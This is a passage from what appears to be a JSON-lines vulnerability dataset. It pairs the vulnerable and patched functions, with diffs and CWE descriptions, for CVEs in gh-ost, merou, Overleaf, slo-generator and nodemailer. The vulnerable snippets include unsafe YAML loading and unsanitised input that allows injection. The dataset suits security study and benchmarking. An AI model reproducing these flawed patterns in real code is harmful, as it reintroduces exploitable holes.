this query is lightweight\")\n\tthrottleHTTP := flag.String(\"throttle-http\", \"\", \"when given, gh-ost checks given URL via HEAD request; any response code other than 200 (OK) causes throttling; make sure it has low latency response\")\n\tignoreHTTPErrors := flag.Bool(\"ignore-http-errors\", false, \"ignore HTTP connection errors during throttle check\")\n\theartbeatIntervalMillis := flag.Int64(\"heartbeat-interval-millis\", 100, \"how frequently would gh-ost inject a heartbeat value\")\n\tflag.StringVar(&migrationContext.ThrottleFlagFile, \"throttle-flag-file\", \"\", \"operation pauses when this file exists; hint: use a file that is specific to the table being altered\")\n\tflag.StringVar(&migrationContext.ThrottleAdditionalFlagFile, \"throttle-additional-flag-file\", \"/tmp/gh-ost.throttle\", \"operation pauses when this file exists; hint: keep default, use for throttling multiple gh-ost operations\")\n\tflag.StringVar(&migrationContext.PostponeCutOverFlagFile, \"postpone-cut-over-flag-file\", \"\", \"while this file exists, migration will postpone the final stage of swapping tables, and will keep on syncing the ghost table. Cut-over/swapping would be ready to perform the moment the file is deleted.\")\n\tflag.StringVar(&migrationContext.PanicFlagFile, \"panic-flag-file\", \"\", \"when this file is created, gh-ost will immediately terminate, without cleanup\")\n\n\tflag.BoolVar(&migrationContext.DropServeSocket, \"initially-drop-socket-file\", false, \"Should gh-ost forcibly delete an existing socket file. Be careful: this might drop the socket file of a running migration!\")\n\tflag.StringVar(&migrationContext.ServeSocketFile, \"serve-socket-file\", \"\", \"Unix socket file to serve on. Default: auto-determined and advertised upon startup\")\n\tflag.Int64Var(&migrationContext.ServeTCPPort, \"serve-tcp-port\", 0, \"TCP port to serve on. Default: disabled\")\n\n\tflag.StringVar(&migrationContext.HooksPath, \"hooks-path\", \"\", \"directory where hook files are found (default: empty, ie. hooks disabled). Hook files found on this path, and conforming to hook naming conventions will be executed\")\n\tflag.StringVar(&migrationContext.HooksHintMessage, \"hooks-hint\", \"\", \"arbitrary message to be injected to hooks via GH_OST_HOOKS_HINT, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintOwner, \"hooks-hint-owner\", \"\", \"arbitrary name of owner to be injected to hooks via GH_OST_HOOKS_HINT_OWNER, for your convenience\")\n\tflag.StringVar(&migrationContext.HooksHintToken, \"hooks-hint-token\", \"\", \"arbitrary token to be injected to hooks via GH_OST_HOOKS_HINT_TOKEN, for your convenience\")\n\n\tflag.UintVar(&migrationContext.ReplicaServerId, \"replica-server-id\", 99999, \"server id used by gh-ost process. Default: 99999\")\n\n\tmaxLoad := flag.String(\"max-load\", \"\", \"Comma delimited status-name=threshold. e.g: 'Threads_running=100,Threads_connected=500'. When status exceeds threshold, app throttles writes\")\n\tcriticalLoad := flag.String(\"critical-load\", \"\", \"Comma delimited status-name=threshold, same format as --max-load. When status exceeds threshold, app panics and quits\")\n\tflag.Int64Var(&migrationContext.CriticalLoadIntervalMilliseconds, \"critical-load-interval-millis\", 0, \"When 0, migration immediately bails out upon meeting critical-load. When non-zero, a second check is done after given interval, and migration only bails out if 2nd check still meets critical load\")\n\tflag.Int64Var(&migrationContext.CriticalLoadHibernateSeconds, \"critical-load-hibernate-seconds\", 0, \"When non-zero, critical-load does not panic and bail out; instead, gh-ost goes into hibernation for the specified duration. It will not read/write anything from/to any server\")\n\tquiet := flag.Bool(\"quiet\", false, \"quiet\")\n\tverbose := flag.Bool(\"verbose\", false, \"verbose\")\n\tdebug := flag.Bool(\"debug\", false, \"debug mode (very verbose)\")\n\tstack := flag.Bool(\"stack\", false, \"add stack trace upon error\")\n\thelp := flag.Bool(\"help\", false, \"Display usage\")\n\tversion := flag.Bool(\"version\", false, \"Print version & exit\")\n\tcheckFlag := flag.Bool(\"check-flag\", false, \"Check if another flag exists/supported. This allows for cross-version scripting. Exits with 0 when all additional provided flags exist, nonzero otherwise. You must provide (dummy) values for flags that require a value. Example: gh-ost --check-flag --cut-over-lock-timeout-seconds --nice-ratio 0\")\n\tflag.StringVar(&migrationContext.ForceTmpTableName, \"force-table-names\", \"\", \"table name prefix to be used on the temporary tables\")\n\tflag.CommandLine.SetOutput(os.Stdout)\n\n\tflag.Parse()\n\n\tif *checkFlag {\n\t\treturn\n\t}\n\tif *help {\n\t\tfmt.Fprintf(os.Stdout, \"Usage of gh-ost:\\n\")\n\t\tflag.PrintDefaults()\n\t\treturn\n\t}\n\tif *version {\n\t\tappVersion := AppVersion\n\t\tif appVersion == \"\" {\n\t\t\tappVersion = \"unversioned\"\n\t\t}\n\t\tfmt.Println(appVersion)\n\t\treturn\n\t}\n\n\tmigrationContext.Log.SetLevel(log.ERROR)\n\tif *verbose {\n\t\tmigrationContext.Log.SetLevel(log.INFO)\n\t}\n\tif *debug {\n\t\tmigrationContext.Log.SetLevel(log.DEBUG)\n\t}\n\tif *stack {\n\t\tmigrationContext.Log.SetPrintStackTrace(*stack)\n\t}\n\tif *quiet {\n\t\t// Override!!\n\t\tmigrationContext.Log.SetLevel(log.ERROR)\n\t}\n\n\tif migrationContext.AlterStatement == \"\" {\n\t\tlog.Fatalf(\"--alter must be provided and statement must not be empty\")\n\t}\n\tparser := sql.NewParserFromAlterStatement(migrationContext.AlterStatement)\n\tmigrationContext.AlterStatementOptions = parser.GetAlterStatementOptions()\n\n\tif migrationContext.DatabaseName == \"\" {\n\t\tif parser.HasExplicitSchema() {\n\t\t\tmigrationContext.DatabaseName = parser.GetExplicitSchema()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--database must be provided and database name must not be empty, or --alter must specify database name\")\n\t\t}\n\t}\n\n\tif err := flag.Set(\"database\", url.QueryEscape(migrationContext.DatabaseName)); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\n\tif migrationContext.OriginalTableName == \"\" {\n\t\tif parser.HasExplicitTable() {\n\t\t\tmigrationContext.OriginalTableName = parser.GetExplicitTable()\n\t\t} else {\n\t\t\tlog.Fatalf(\"--table must be provided and table name must not be empty, or --alter must specify table name\")\n\t\t}\n\t}\n\tmigrationContext.Noop = !(*executeFlag)\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.AllowedRunningOnMaster && migrationContext.MigrateOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--allow-on-master and --migrate-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.MigrateOnReplica && migrationContext.TestOnReplica {\n\t\tmigrationContext.Log.Fatalf(\"--migrate-on-replica and --test-on-replica are mutually exclusive\")\n\t}\n\tif migrationContext.SwitchToRowBinlogFormat && migrationContext.AssumeRBR {\n\t\tmigrationContext.Log.Fatalf(\"--switch-to-rbr and --assume-rbr are mutually exclusive\")\n\t}\n\tif migrationContext.TestOnReplicaSkipReplicaStop {\n\t\tif !migrationContext.TestOnReplica {\n\t\t\tmigrationContext.Log.Fatalf(\"--test-on-replica-skip-replica-stop requires --test-on-replica to be enabled\")\n\t\t}\n\t\tmigrationContext.Log.Warning(\"--test-on-replica-skip-replica-stop enabled. We will not stop replication before cut-over. Ensure you have a plugin that does this.\")\n\t}\n\tif migrationContext.CliMasterUser != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-user requires --assume-master-host\")\n\t}\n\tif migrationContext.CliMasterPassword != \"\" && migrationContext.AssumeMasterHostname == \"\" {\n\t\tmigrationContext.Log.Fatalf(\"--master-password requires --assume-master-host\")\n\t}\n\tif migrationContext.TLSCACertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-ca requires --ssl\")\n\t}\n\tif migrationContext.TLSCertificate != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-cert requires --ssl\")\n\t}\n\tif migrationContext.TLSKey != \"\" && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-key requires --ssl\")\n\t}\n\tif migrationContext.TLSAllowInsecure && !migrationContext.UseTLS {\n\t\tmigrationContext.Log.Fatalf(\"--ssl-allow-insecure requires --ssl\")\n\t}\n\tif *replicationLagQuery != \"\" {\n\t\tmigrationContext.Log.Warningf(\"--replication-lag-query is deprecated\")\n\t}\n\n\tswitch *cutOver {\n\tcase \"atomic\", \"default\", \"\":\n\t\tmigrationContext.CutOverType = base.CutOverAtomic\n\tcase \"two-step\":\n\t\tmigrationContext.CutOverType = base.CutOverTwoStep\n\tdefault:\n\t\tmigrationContext.Log.Fatalf(\"Unknown cut-over: %s\", *cutOver)\n\t}\n\tif err := migrationContext.ReadConfigFile(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadThrottleControlReplicaKeys(*throttleControlReplicas); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadMaxLoad(*maxLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.ReadCriticalLoad(*criticalLoad); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif migrationContext.ServeSocketFile == \"\" {\n\t\tmigrationContext.ServeSocketFile = fmt.Sprintf(\"/tmp/gh-ost.%s.%s.sock\", migrationContext.DatabaseName, migrationContext.OriginalTableName)\n\t}\n\tif *askPass {\n\t\tfmt.Println(\"Password:\")\n\t\tbytePassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\t\tif err != nil {\n\t\t\tmigrationContext.Log.Fatale(err)\n\t\t}\n\t\tmigrationContext.CliPassword = string(bytePassword)\n\t}\n\tmigrationContext.SetHeartbeatIntervalMilliseconds(*heartbeatIntervalMillis)\n\tmigrationContext.SetNiceRatio(*niceRatio)\n\tmigrationContext.SetChunkSize(*chunkSize)\n\tmigrationContext.SetDMLBatchSize(*dmlBatchSize)\n\tmigrationContext.SetMaxLagMillisecondsThrottleThreshold(*maxLagMillis)\n\tmigrationContext.SetThrottleQuery(*throttleQuery)\n\tmigrationContext.SetThrottleHTTP(*throttleHTTP)\n\tmigrationContext.SetIgnoreHTTPErrors(*ignoreHTTPErrors)\n\tmigrationContext.SetDefaultNumRetries(*defaultRetries)\n\tmigrationContext.ApplyCredentials()\n\tif err := migrationContext.SetupTLS(); err != nil {\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tif err := migrationContext.SetCutOverLockTimeoutSeconds(*cutOverLockTimeoutSeconds); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\tif err := migrationContext.SetExponentialBackoffMaxInterval(*exponentialBackoffMaxInterval); err != nil {\n\t\tmigrationContext.Log.Errore(err)\n\t}\n\n\tlog.Infof(\"starting gh-ost %+v\", AppVersion)\n\tacceptSignals(migrationContext)\n\n\tmigrator := logic.NewMigrator(migrationContext)\n\terr := migrator.Migrate()\n\tif err != nil {\n\t\tmigrator.ExecOnFailureHook()\n\t\tmigrationContext.Log.Fatale(err)\n\t}\n\tfmt.Fprintf(os.Stdout, \"# Done\\n\")\n}"}], "vul_patch": "--- a/go/cmd/gh-ost/main.go\n+++ b/go/cmd/gh-ost/main.go\n@@ -142,6 +142,11 @@\n \t\t\tlog.Fatalf(\"--database must be provided and database name must not be empty, or --alter must specify database name\")\n \t\t}\n \t}\n+\n+\tif err := flag.Set(\"database\", url.QueryEscape(migrationContext.DatabaseName)); err != nil {\n+\t\tmigrationContext.Log.Fatale(err)\n+\t}\n+\n \tif migrationContext.OriginalTableName == \"\" {\n \t\tif parser.HasExplicitTable() {\n \t\t\tmigrationContext.OriginalTableName = parser.GetExplicitTable()\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-4768", "cve_description": "A vulnerability was found in Dropbox merou. It has been classified as critical. Affected is the function add_public_key of the file grouper/public_key.py of the component SSH Public Key Handler. The manipulation of the argument public_key_str leads to injection. It is possible to launch the attack remotely. The name of the patch is d93087973afa26bc0a2d0a5eb5c0fde748bdd107. It is recommended to apply a patch to fix this issue. VDB-216906 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/dropbox/merou", "patch_url": ["https://github.com/dropbox/merou/commit/d93087973afa26bc0a2d0a5eb5c0fde748bdd107"], "programing_language": "Python", "vul_func": [{"id": "vul_py_156_1", "commit": "30755ea", "file_path": "grouper/public_key.py", "start_line": 52, "end_line": 99, "snippet": "def add_public_key(session, user, public_key_str):\n \"\"\"Add a public key for a particular user.\n\n Args:\n session: db session\n user: User model of user in question\n public_key_str: public key to add\n\n Throws:\n DuplicateKey if key is already in use\n PublicKeyParseError if key can't be parsed\n BadPublicKey if a plugin rejects the key\n\n Returns:\n PublicKey model object representing the key\n \"\"\"\n pubkey = sshpubkeys.SSHKey(public_key_str, strict=True)\n\n try:\n pubkey.parse()\n except sshpubkeys.InvalidKeyException as e:\n raise PublicKeyParseError(str(e))\n\n try:\n get_plugin_proxy().will_add_public_key(pubkey)\n except PluginRejectedPublicKey as e:\n raise BadPublicKey(str(e))\n\n db_pubkey = PublicKey(\n user=user,\n public_key=pubkey.keydata.strip(),\n fingerprint=pubkey.hash_md5().replace(\"MD5:\", \"\"),\n fingerprint_sha256=pubkey.hash_sha256().replace(\"SHA256:\", \"\"),\n key_size=pubkey.bits,\n key_type=pubkey.key_type,\n comment=pubkey.comment,\n )\n\n try:\n db_pubkey.add(session)\n Counter.incr(session, \"updates\")\n except IntegrityError:\n session.rollback()\n raise DuplicateKey()\n\n session.commit()\n\n return db_pubkey"}], "fix_func": [{"id": "fix_py_156_1", "commit": "d930879", "file_path": "grouper/public_key.py", "start_line": 52, "end_line": 106, "snippet": "def add_public_key(session, user, public_key_str):\n \"\"\"Add a public key for a particular user.\n\n Args:\n session: db session\n user: User model of user in question\n public_key_str: public key to add\n\n Throws:\n DuplicateKey if key is already in use\n PublicKeyParseError if key can't be parsed\n BadPublicKey if a plugin rejects the key\n\n Returns:\n PublicKey model object representing the key\n \"\"\"\n pubkey = sshpubkeys.SSHKey(public_key_str, strict=True)\n\n try:\n pubkey.parse()\n except sshpubkeys.InvalidKeyException as e:\n raise PublicKeyParseError(str(e))\n\n # Allowing newlines can lead to injection attacks depending on how the key is\n # consumed, such as if it's dumped in an authorized_keys file with a `command`\n # restriction.\n # Note parsing the key is insufficient to block this.\n if \"\\r\" in public_key_str or \"\\n\" in public_key_str:\n raise PublicKeyParseError(\"Public key cannot have newlines\")\n\n try:\n get_plugin_proxy().will_add_public_key(pubkey)\n except PluginRejectedPublicKey as e:\n raise BadPublicKey(str(e))\n\n db_pubkey = PublicKey(\n user=user,\n public_key=pubkey.keydata.strip(),\n fingerprint=pubkey.hash_md5().replace(\"MD5:\", \"\"),\n fingerprint_sha256=pubkey.hash_sha256().replace(\"SHA256:\", \"\"),\n key_size=pubkey.bits,\n key_type=pubkey.key_type,\n comment=pubkey.comment,\n )\n\n try:\n db_pubkey.add(session)\n Counter.incr(session, \"updates\")\n except IntegrityError:\n session.rollback()\n raise DuplicateKey()\n\n session.commit()\n\n return db_pubkey"}], "vul_patch": "--- a/grouper/public_key.py\n+++ b/grouper/public_key.py\n@@ -20,6 +20,13 @@\n pubkey.parse()\n except sshpubkeys.InvalidKeyException as e:\n raise PublicKeyParseError(str(e))\n+\n+ # Allowing newlines can lead to injection attacks depending on how the key is\n+ # consumed, such as if it's dumped in an authorized_keys file with a `command`\n+ # restriction.\n+ # Note parsing the key is insufficient to block this.\n+ if \"\\r\" in public_key_str or \"\\n\" in public_key_str:\n+ raise PublicKeyParseError(\"Public key cannot have newlines\")\n \n try:\n get_plugin_proxy().will_add_public_key(pubkey)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45312", "cve_description": "Overleaf is a web-based collaborative LaTeX editor. Overleaf Community Edition and Server Pro prior to version 5.0.7 (or 4.2.7 for the 4.x series) contain a vulnerability that allows an arbitrary language parameter in client spelling requests to be passed to the `aspell` executable running on the server. This causes `aspell` to attempt to load a dictionary file with an arbitrary filename. File access is limited to the scope of the overleaf server. The problem is patched in versions 5.0.7 and 4.2.7. Previous versions can be upgraded using the Overleaf toolkit `bin/upgrade` command. Users unable to upgrade may block POST requests to `/spelling/check` via a Web Application Firewall will prevent access to the vulnerable spell check feature. However, upgrading is advised.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/overleaf/overleaf", "patch_url": ["https://github.com/overleaf/overleaf/commit/b5e5d39c3ad4e7763d42b837738955f8ded4dcd3"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_138_1", "commit": "2dae278", "file_path": "services/web/app/src/Features/Spelling/SpellingController.js", "start_line": 31, "end_line": 62, "snippet": " proxyRequestToSpellingApi(req, res) {\n const { language } = req.body\n\n let url = req.url.slice('/spelling'.length)\n\n if (url === '/check') {\n if (!language) {\n logger.error(\n {},\n '\"language\" field should be included for spell checking'\n )\n return res.status(422).json({ misspellings: [] })\n }\n\n if (!languageCodeIsSupported(language)) {\n // this log statement can be changed to 'error' once projects with\n // unsupported languages are removed from the DB\n logger.debug({ language }, 'language not supported')\n return res.status(422).json({ misspellings: [] })\n }\n }\n\n const userId = SessionManager.getLoggedInUserId(req.session)\n url = `/user/${userId}${url}`\n req.headers.Host = Settings.apis.spelling.host\n return request({\n url: Settings.apis.spelling.url + url,\n method: req.method,\n headers: req.headers,\n json: req.body,\n timeout: TEN_SECONDS,\n })"}, {"id": "vul_js_138_2", "commit": "2dae278", "file_path": "services/web/app/src/router.js", "start_line": 1083, "end_line": 1087, "snippet": " webRouter.post(\n '/spelling/check',\n AuthenticationController.requireLogin(),\n SpellingController.proxyRequestToSpellingApi\n )"}], "fix_func": [{"id": "fix_js_138_1", "commit": "b5e5d39", "file_path": "services/web/app/src/Features/Spelling/SpellingController.js", "start_line": 31, "end_line": 55, "snippet": " proxyCheckRequestToSpellingApi(req, res) {\n const { language } = req.body\n\n if (!language) {\n logger.error({}, '\"language\" field should be included for spell checking')\n return res.status(422).json({ misspellings: [] })\n }\n\n if (!languageCodeIsSupported(language)) {\n // this log statement can be changed to 'error' once projects with\n // unsupported languages are removed from the DB\n logger.debug({ language }, 'language not supported')\n return res.status(422).json({ misspellings: [] })\n }\n\n const userId = SessionManager.getLoggedInUserId(req.session)\n const url = `${Settings.apis.spelling.url}/user/${userId}/check`\n req.headers.Host = Settings.apis.spelling.host\n return request({\n url,\n method: 'POST',\n headers: req.headers,\n json: req.body,\n timeout: TEN_SECONDS,\n })"}, {"id": "fix_js_138_2", "commit": "b5e5d39", "file_path": "services/web/app/src/router.js", "start_line": 1083, "end_line": 1087, "snippet": " webRouter.post(\n '/spelling/check',\n AuthenticationController.requireLogin(),\n SpellingController.proxyCheckRequestToSpellingApi\n )"}], "vul_patch": "--- a/services/web/app/src/Features/Spelling/SpellingController.js\n+++ b/services/web/app/src/Features/Spelling/SpellingController.js\n@@ -1,31 +1,24 @@\n- proxyRequestToSpellingApi(req, res) {\n+ proxyCheckRequestToSpellingApi(req, res) {\n const { language } = req.body\n \n- let url = req.url.slice('/spelling'.length)\n+ if (!language) {\n+ logger.error({}, '\"language\" field should be included for spell checking')\n+ return res.status(422).json({ misspellings: [] })\n+ }\n \n- if (url === '/check') {\n- if (!language) {\n- logger.error(\n- {},\n- '\"language\" field should be included for spell checking'\n- )\n- return res.status(422).json({ misspellings: [] })\n- }\n-\n- if (!languageCodeIsSupported(language)) {\n- // this log statement can be changed to 'error' once projects with\n- // unsupported languages are removed from the DB\n- logger.debug({ language }, 'language not supported')\n- return res.status(422).json({ misspellings: [] })\n- }\n+ if (!languageCodeIsSupported(language)) {\n+ // this log statement can be changed to 'error' once projects with\n+ // unsupported languages are removed from the DB\n+ logger.debug({ language }, 'language not supported')\n+ return res.status(422).json({ misspellings: [] })\n }\n \n const userId = SessionManager.getLoggedInUserId(req.session)\n- url = `/user/${userId}${url}`\n+ const url = `${Settings.apis.spelling.url}/user/${userId}/check`\n req.headers.Host = Settings.apis.spelling.host\n return request({\n- url: Settings.apis.spelling.url + url,\n- method: req.method,\n+ url,\n+ method: 'POST',\n headers: req.headers,\n json: req.body,\n timeout: TEN_SECONDS,\n\n--- a/services/web/app/src/router.js\n+++ b/services/web/app/src/router.js\n@@ -1,5 +1,5 @@\n webRouter.post(\n '/spelling/check',\n AuthenticationController.requireLogin(),\n- SpellingController.proxyRequestToSpellingApi\n+ SpellingController.proxyCheckRequestToSpellingApi\n )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-22557", "cve_description": "SLO generator allows for loading of YAML files that if crafted in a specific format can allow for code execution within the context of the SLO Generator. We recommend upgrading SLO Generator past https://github.com/google/slo-generator/pull/173", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/google/slo-generator", "patch_url": ["https://github.com/google/slo-generator/commit/36318beab1b85d14bb860e45bea186b184690d5d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_266_1", "commit": "50ce1bf", "file_path": "slo_generator/migrations/migrator.py", "start_line": 215, "end_line": 247, "snippet": "def exporters_v1tov2(exporters_paths, shared_config={}, quiet=False):\n \"\"\"Translate exporters to v2 and put into shared config.\n\n Args:\n exporters_path (list): List of exporters file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of exporters keys added to shared config.\n \"\"\"\n exp_keys = []\n for exp_path in exporters_paths:\n with open(exp_path, encoding='utf-8') as conf:\n content = yaml.load(conf, Loader=yaml.Loader)\n exporters = content\n\n # If exporters file has sections, concatenate all of them\n if isinstance(content, dict):\n exporters = []\n for _, value in content.items():\n exporters.extend(value)\n\n # If exporter not in general config, add it and add an alias for the\n # exporter. Refer to the alias in the SLO config file.\n for exporter in exporters:\n exporter = OrderedDict(exporter)\n exp_key = add_to_shared_config(exporter,\n shared_config,\n 'exporters',\n quiet=quiet)\n exp_keys.append(exp_key)\n return exp_keys"}, {"id": "vul_py_266_2", "commit": "50ce1bf", "file_path": "slo_generator/migrations/migrator.py", "start_line": 250, "end_line": 285, "snippet": "def ebp_v1tov2(ebp_paths, shared_config={}, quiet=False):\n \"\"\"Translate error budget policies to v2 and put into shared config\n\n Args:\n ebp_paths (list): List of error budget policies file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of error budget policies keys added to shared config.\n \"\"\"\n ebp_keys = []\n for ebp_path in ebp_paths:\n with open(ebp_path, encoding='utf-8') as conf:\n error_budget_policy = yaml.load(conf, Loader=yaml.Loader)\n for step in error_budget_policy:\n step['name'] = step.pop('error_budget_policy_step_name')\n step['burn_rate_threshold'] = step.pop(\n 'alerting_burn_rate_threshold')\n step['alert'] = step.pop('urgent_notification')\n step['message_alert'] = step.pop('overburned_consequence_message')\n step['message_ok'] = step.pop('achieved_consequence_message')\n step['window'] = step.pop('measurement_window_seconds')\n\n ebp = {'steps': error_budget_policy}\n if ebp_path.name == 'error_budget_policy.yaml':\n ebp_key = 'default'\n else:\n ebp_key = ebp_path.stem.replace('error_budget_policy_', '')\n ebp_key = add_to_shared_config(ebp,\n shared_config,\n 'error_budget_policies',\n ebp_key,\n quiet=quiet)\n ebp_keys.append(ebp_key)\n return ebp_keys"}], "fix_func": [{"id": "fix_py_266_1", "commit": "36318be", "file_path": "slo_generator/migrations/migrator.py", "start_line": 215, "end_line": 247, "snippet": "def exporters_v1tov2(exporters_paths, shared_config={}, quiet=False):\n \"\"\"Translate exporters to v2 and put into shared config.\n\n Args:\n exporters_path (list): List of exporters file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of exporters keys added to shared config.\n \"\"\"\n exp_keys = []\n for exp_path in exporters_paths:\n with open(exp_path, encoding='utf-8') as conf:\n content = yaml.load(conf, Loader=yaml.SafeLoader)\n exporters = content\n\n # If exporters file has sections, concatenate all of them\n if isinstance(content, dict):\n exporters = []\n for _, value in content.items():\n exporters.extend(value)\n\n # If exporter not in general config, add it and add an alias for the\n # exporter. Refer to the alias in the SLO config file.\n for exporter in exporters:\n exporter = OrderedDict(exporter)\n exp_key = add_to_shared_config(exporter,\n shared_config,\n 'exporters',\n quiet=quiet)\n exp_keys.append(exp_key)\n return exp_keys"}, {"id": "fix_py_266_2", "commit": "36318be", "file_path": "slo_generator/migrations/migrator.py", "start_line": 250, "end_line": 285, "snippet": "def ebp_v1tov2(ebp_paths, shared_config={}, quiet=False):\n \"\"\"Translate error budget policies to v2 and put into shared config\n\n Args:\n ebp_paths (list): List of error budget policies file paths.\n shared_config (dict): Shared config to add exporters to.\n quiet (bool): Quiet mode.\n\n Returns:\n list: List of error budget policies keys added to shared config.\n \"\"\"\n ebp_keys = []\n for ebp_path in ebp_paths:\n with open(ebp_path, encoding='utf-8') as conf:\n error_budget_policy = yaml.load(conf, Loader=yaml.SafeLoader)\n for step in error_budget_policy:\n step['name'] = step.pop('error_budget_policy_step_name')\n step['burn_rate_threshold'] = step.pop(\n 'alerting_burn_rate_threshold')\n step['alert'] = step.pop('urgent_notification')\n step['message_alert'] = step.pop('overburned_consequence_message')\n step['message_ok'] = step.pop('achieved_consequence_message')\n step['window'] = step.pop('measurement_window_seconds')\n\n ebp = {'steps': error_budget_policy}\n if ebp_path.name == 'error_budget_policy.yaml':\n ebp_key = 'default'\n else:\n ebp_key = ebp_path.stem.replace('error_budget_policy_', '')\n ebp_key = add_to_shared_config(ebp,\n shared_config,\n 'error_budget_policies',\n ebp_key,\n quiet=quiet)\n ebp_keys.append(ebp_key)\n return ebp_keys"}], "vul_patch": "--- a/slo_generator/migrations/migrator.py\n+++ b/slo_generator/migrations/migrator.py\n@@ -12,7 +12,7 @@\n exp_keys = []\n for exp_path in exporters_paths:\n with open(exp_path, encoding='utf-8') as conf:\n- content = yaml.load(conf, Loader=yaml.Loader)\n+ content = yaml.load(conf, Loader=yaml.SafeLoader)\n exporters = content\n \n # If exporters file has sections, concatenate all of them\n\n--- a/slo_generator/migrations/migrator.py\n+++ b/slo_generator/migrations/migrator.py\n@@ -12,7 +12,7 @@\n ebp_keys = []\n for ebp_path in ebp_paths:\n with open(ebp_path, encoding='utf-8') as conf:\n- error_budget_policy = yaml.load(conf, Loader=yaml.Loader)\n+ error_budget_policy = yaml.load(conf, Loader=yaml.SafeLoader)\n for step in error_budget_policy:\n step['name'] = step.pop('error_budget_policy_step_name')\n step['burn_rate_threshold'] = step.pop(\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23400", "cve_description": "The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/nodemailer/nodemailer", "patch_url": ["https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_137_1", "commit": "1750c0f", "file_path": "lib/mime-node/index.js", "start_line": 1140, "end_line": 1168, "snippet": " _convertAddresses(addresses, uniqueList) {\n let values = [];\n\n uniqueList = uniqueList || [];\n\n [].concat(addresses || []).forEach(address => {\n if (address.address) {\n address.address = this._normalizeAddress(address.address);\n\n if (!address.name) {\n values.push(address.address);\n } else if (address.name) {\n values.push(this._encodeAddressName(address.name) + ' <' + address.address + '>');\n }\n\n if (address.address) {\n if (!uniqueList.filter(a => a.address === address.address).length) {\n uniqueList.push(address);\n }\n }\n } else if (address.group) {\n values.push(\n this._encodeAddressName(address.name) + ':' + (address.group.length ? this._convertAddresses(address.group, uniqueList) : '').trim() + ';'\n );\n }\n });\n\n return values.join(', ');\n }"}, {"id": "vul_js_137_2", "commit": "1750c0f", "file_path": "lib/mime-node/index.js", "start_line": 1176, "end_line": 1193, "snippet": " _normalizeAddress(address) {\n address = (address || '').toString().trim();\n\n let lastAt = address.lastIndexOf('@');\n if (lastAt < 0) {\n // Bare username\n return address;\n }\n let user = address.substr(0, lastAt);\n let domain = address.substr(lastAt + 1);\n\n // Usernames are not touched and are kept as is even if these include unicode\n // Domains are punycoded by default\n // 'j\\u00f5geva.ee' will be converted to 'xn--jgeva-dua.ee'\n // non-unicode domains are left as is\n\n return user + '@' + punycode.toASCII(domain.toLowerCase());\n }"}], "fix_func": [{"id": "fix_js_137_1", "commit": "7e02648", "file_path": "lib/mime-node/index.js", "start_line": 1140, "end_line": 1167, "snippet": " 